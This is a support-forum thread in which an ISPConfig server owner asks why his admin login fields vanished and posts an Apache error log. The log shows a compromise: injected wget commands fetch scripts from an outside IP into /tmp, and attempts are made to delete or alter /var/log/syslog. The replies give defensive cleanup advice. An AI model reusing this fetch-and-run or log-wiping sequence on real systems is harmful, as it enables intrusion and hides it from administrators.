No login boxes

Discussion in 'General' started by jopa123, Mar 5, 2014.

  1. jopa123

    jopa123 New Member

    Hey guys,

    I've got ISPConfig 3 running on Ubuntu 9.04. It's been great for quite some time.

    However, for some reason I no longer have boxes available to log into the admin page. The login page comes up with the usual look, just no place to enter admin credentials.

    I'm sure it is something I did but I am stumped.

    Any ideas?

    Thanks in advance for any help.
     
  2. till

    till Super Moderator Staff Member ISPConfig Developer

    Take a look at the apache error.log. maybe you changed some php.ini settings that prevent ispconfig to work.
     
  3. jopa123

    jopa123 New Member

    error.log

    Till,

    Thanks for the response. Following is my Apache2 error.log file. I don't know what I'm looking at but the one thing that sticks out is the repeated connections to 221.132.37.26:80. This is not my IP address. Neither is 54.246.4.70. Does anything else look out of place? If this is something I should not post here, please let me know.


    [Sun Mar 02 06:50:21 2014] [notice] Apache/2.2.11 (Ubuntu) PHP/5.2.6-3ubuntu4.6 with Suhosin-Patch mod_ssl/2.2.11 OpenSSL/0.9.8g configured -- resuming normal operations
    [Sun Mar 02 06:50:21 2014] [warn] long lost child came home! (pid 14375)
    [Sun Mar 02 06:50:21 2014] [notice] mod_fcgid: call /var/www/linkplazas.info/web/index.php with wrapper /var/www/php-fcgi-scripts/web10/.php-fcgi-starter
    [Sun Mar 02 06:50:43 2014] [notice] mod_fcgid: call /var/www/linkplazas.info/web/index.php with wrapper /var/www/php-fcgi-scripts/web10/.php-fcgi-starter
    [Sun Mar 02 06:55:17 2014] [notice] mod_fcgid: call /var/www/goodcarinsurance.net/web/compare-car-insurance-rate.php with wrapper /var/www/php-fcgi-scripts/web15/.php-fcgi-starter
    [Sun Mar 02 07:10:16 2014] [error] [client 130.185.109.239] File does not exist: /var/www/robots.txt
    [Sun Mar 02 07:26:31 2014] [notice] mod_fcgid: call /var/www/rockwalldata.com/web/index.php with wrapper /var/www/php-fcgi-scripts/web23/.php-fcgi-starter
    [Sun Mar 02 08:18:01 2014] [notice] mod_fcgid: call /var/www/lakesideambucs.org/web/index.php with wrapper /var/www/php-fcgi-scripts/web29/.php-fcgi-starter
    [Sun Mar 02 09:14:34 2014] [error] [client 37.9.53.129] File does not exist: /var/www/administrator
    [Sun Mar 02 09:28:47 2014] [error] [client 66.249.79.82] File does not exist: /var/www/robots.txt
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] --2014-03-02 09:36:45-- http://221.132.37.26/sh
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] Connecting to 221.132.37.26:80...
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] connected.
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] HTTP request sent, awaiting response...
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] 200 OK
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] Length: 1069 (1.0K) [text/plain]
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] Saving to: `/tmp/sh'
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] 0K . 100% 103M=0s
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70] 2014-03-02 09:36:45 (103 MB/s) - `/tmp/sh' saved [1069/1069]
    [Sun Mar 02 09:36:45 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] rm:
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] cannot remove `/var/log/syslog'
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] : Permission denied
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] touch:
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] cannot touch `/var/log/syslog'
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] : Permission denied
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] chmod:
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] changing permissions of `/var/log/syslog'
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] : Operation not permitted
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] chattr: Permission denied
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] while reading flags on /var/log/syslog\r
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] --2014-03-02 09:36:48-- http://221.132.37.26/ru
    [Sun Mar 02 09:36:48 2014] [error] [client 54.246.4.70] Connecting to 221.132.37.26:80...
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] connected.
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] HTTP request sent, awaiting response...
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] 200 OK
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] Length: 944 [text/plain]
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] Saving to: `ru'
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] 0K 100% 84.9M=0s
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70] 2014-03-02 09:36:49 (84.9 MB/s) - `ru' saved [944/944]
    [Sun Mar 02 09:36:49 2014] [error] [client 54.246.4.70]
    [Sun Mar 02 09:36:50 2014] [error] [client 54.246.4.70] --2014-03-02 09:36:50-- http://221.132.37.26/rr
    [Sun Mar 02 09:36:50 2014] [error] [client 54.246.4.70] Connecting to 221.132.37.26:80...
    [Sun Mar 02 09:36:50 2014] [error] [client 54.246.4.70] connected.
     
  4. jopa123

    jopa123 New Member

    Have I been hacked?

    It looks like illegal calls are being made.
     
  5. jopa123

    jopa123 New Member

    I'm assuming my box is hacked. Do I have any options other than wiping it and starting over?
     
  6. till

    till Super Moderator Staff Member ISPConfig Developer

    According to the log, just a website is hacked. So it might not be nescessary to reinstall the whole server. Chcek the /tmp directory for unusual files and post a :

    ls -la /tmp

    to see which user owns these files. Then you should scan the server with rkhunter and maldetect:

    http://www.howtoforge.com/forums/showpost.php?p=286287&postcount=9
     
  7. jopa123

    jopa123 New Member

    Thanks, Till,

    Here is the ls la /tmp

    total 80
    drwxrwxrwx 4 root root 65536 2014-03-17 21:35 .
    drwxr-xr-x 22 root root 4096 2014-03-17 18:39 ..
    drwxrwxrwt 2 root root 4096 2014-03-17 18:39 .ICE-unix
    drwxrwxrwt 2 root root 4096 2014-03-17 18:39 .X11-unix

    I ran maldetect and it found and quarantined 5 items. This may have fixed my issues but I don't know since I still do not have login boxes for the ISPConfig admin page. So I can't log in.

    I installed RKHunter but it would not run. User error I'm sure. I get the following error.

    'Invalid SCRIPTWHITELIST configuration option: Non-existent pathname: /usr/sbin/prelink'

    Very grateful for any and all help.
     
  8. jopa123

    jopa123 New Member

    DNS issues?

    In the interest of full disclosure, here are some more symptoms that could be entirely unrelated.

    1) I recently was forced to switch ISP's. I am now on AT&T
    2) When the server is plugged in I seem to have basic surfing issues with other computers in my network.
    3) The issues seem to be DNS related. Websites become slow to respond and there seems to be trouble "resolving host"

    Could the server be overriding DNS calls or something? I feel I could investigat more if I could just log in to ISPConfig.

    Thanks again.
     
  9. jopa123

    jopa123 New Member

    Any suggestions on how I can get my login boxes back on the admin login page?
     
  10. till

    till Super Moderator Staff Member ISPConfig Developer

    which error do you get in the apache error.log, when you open the ispconfig controlpanel page?
     

Share This Page